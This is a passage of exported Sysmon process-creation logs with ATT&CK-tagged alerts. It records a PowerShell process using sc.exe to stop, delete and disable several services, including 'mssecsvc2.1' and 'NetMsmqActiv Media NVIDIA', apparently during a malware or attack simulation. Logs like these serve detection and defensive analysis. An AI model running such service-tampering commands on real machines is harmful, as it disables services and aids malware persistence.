sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.761"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-00109c302b00}"",""processId"":""2028"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.724",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.647 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010df2d2b00} +ProcessId: 7112 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.661164900Z"",""eventRecordID"":""3180"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.647\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010df2d2b00}\r\nProcessId: 7112\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.647"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-0010df2d2b00}"",""processId"":""7112"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.688",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.537 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010612a2b00} +ProcessId: 6936 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.541523900Z"",""eventRecordID"":""3178"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.537\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010612a2b00}\r\nProcessId: 6936\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.537"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-0010612a2b00}"",""processId"":""6936"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.671",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.481 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-001044292b00} +ProcessId: 4996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.499909600Z"",""eventRecordID"":""3177"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.481\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-001044292b00}\r\nProcessId: 4996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.481"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-001044292b00}"",""processId"":""4996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.608",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.208 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-00106e242b00} +ProcessId: 6716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.215375300Z"",""eventRecordID"":""3174"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.208\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-00106e242b00}\r\nProcessId: 6716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.208"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-00106e242b00}"",""processId"":""6716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.671",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:27.743 +ProcessGuid: {df9fc3d3-b3cf-5ecf-0000-00108d1e2b00} +ProcessId: 1852 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:27.746783000Z"",""eventRecordID"":""3171"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:27.743\r\nProcessGuid: {df9fc3d3-b3cf-5ecf-0000-00108d1e2b00}\r\nProcessId: 1852\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:27.743"",""processGuid"":""{df9fc3d3-b3cf-5ecf-0000-00108d1e2b00}"",""processId"":""1852"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.648",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:27.600 +ProcessGuid: {df9fc3d3-b3cf-5ecf-0000-00104b1d2b00} +ProcessId: 6016 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ""NetMsmqActiv Media NVIDIA"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \""NetMsmqActiv Media NVIDIA\"" Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:27.643888300Z"",""eventRecordID"":""3170"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:27.600\r\nProcessGuid: {df9fc3d3-b3cf-5ecf-0000-00104b1d2b00}\r\nProcessId: 6016\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \""NetMsmqActiv Media NVIDIA\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 